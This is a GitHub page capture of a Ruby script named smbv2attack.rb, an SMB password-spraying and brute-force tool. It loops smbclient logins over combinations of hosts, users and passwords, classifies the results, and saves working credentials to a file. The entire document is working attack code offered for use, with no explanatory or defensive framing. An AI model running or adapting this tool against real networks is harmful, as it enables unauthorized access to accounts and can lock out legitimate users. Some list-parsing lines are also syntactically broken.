-
Notifications
You must be signed in to change notification settings - Fork 2
/
smbv2attack.rb
executable file
·99 lines (88 loc) · 3.07 KB
/
smbv2attack.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env ruby
#smbv2 password attack tool
require 'tty'
require 'logger'
require 'colorize'
require 'trollop'
def arguments
opts = Trollop::options do
version "smbv2attack 0.1b".light_blue
opt :hosts, "Choose hosts to attack", :type => String, :short => "-H"
opt :host, "Choose host to attack", :type => String, :short => "-h"
opt :user, "Username", :type => String, :short => "-u"
opt :users, "Username List", :type => String, :short => "-U"
opt :passwords, "Password list", :type => String, :short => "-P"
opt :password, "Password list", :type => String, :short => "-p"
opt :domain, "Domain to attack", :type => String, :default => "WORKGROUP", :short => "-d"
if ARGV.empty?
puts "Need Help? Try ./smbv2attack.rb --help"
exit
end
end
opts
end
def check_smbclient
smbclient = TTY::Which.which('smbclient')
if smbclient.nil?
install_smbclient
end
smbclient
end
def install_smbclient
puts "SMBClient Not Installed. Downloading Now....".light_blue.bold
`apt-get install smbclient`
end
def create_host_list(arg)
if arg[:hosts]
@hosts = File.readlines(arg[:hosts]).map(&:chomp &&:strip)
else
@hosts = [arg[:host].chomp]
end
end
def create_pass_list(arg)
if arg[:passwords]
@pass = File.readlines(arg[:passwords]).map(&:chomp &&:strip)
else
@pass = [arg[:password]]
end
end
def create_user_list(arg)
if arg[:users]
@users = File.readlines(arg[:users]).map(&:chomp &&:strip)
else
@users = [arg[:user].chomp]
end
end
def command
@log = Logger.new('debug.log')
cmd = TTY::Command.new(output: @log)
end
def smb2_attack(arg)
file = "#{Time.now.strftime("%H:%M:%S")}_valid_accounts.txt"
puts "Attack Started #{Time.now.strftime("%H:%M:%S")}".light_blue
@hosts.each do |host|
@users.each do |user|
@pass.each do |pass|
out, err = command.run!("smbclient -W #{arg[:domain]} --max-protocol=smb3 --port=445 --timeout=0.5 //#{host}/QZQ$ -U #{user}%#{pass}")
if out =~ /NT_STATUS_LOGON_FAILURE|NT_STATUS_ACCOUNT_DISABLED|NT_STATUS_ACCOUNT_EXPIRED/
print "[+] #{host} Username: #{user} Password: #{pass} LOGIN FAILED - MESSAGE = #{out.split(":")[1]}"
elsif out =~ /NT_STATUS_ACCESS_DENIED|NT_STATUS_BAD_NETWORK_NAME|NT_STATUS_PASSWORD_MUST_CHANGE/
print "[*] #{host} Username: #{user} Password: #{pass} LOGIN SUCCESS - MESSAGE = #{out.split(":")[1]}".green.bold
File.open("#{file}", 'a') { |f| f.puts("#{host}:#{user}:#{pass}") }
elsif out =~ /NT_STATUS_ACCOUNT_LOCKED_OUT/
puts "[!] #{host} Username: #{user} Password: #{pass} ACCOUNT LOCKED OUT!!!!".red.bold
else
puts "[?] #{host} Username: #{user} Password: #{pass} UNKNOWN STATUS - MESSAGE = #{out.split(":")[1]}".cyan.bold
end
end
end
end
puts "Attack Finished #{Time.now.strftime("%H:%M:%S")}".light_blue
puts "Valid Passwords Written to #{file}".light_magenta.bold
end
arg = arguments
check_smbclient
create_host_list(arg)
create_user_list(arg)
create_pass_list(arg)
smb2_attack(arg)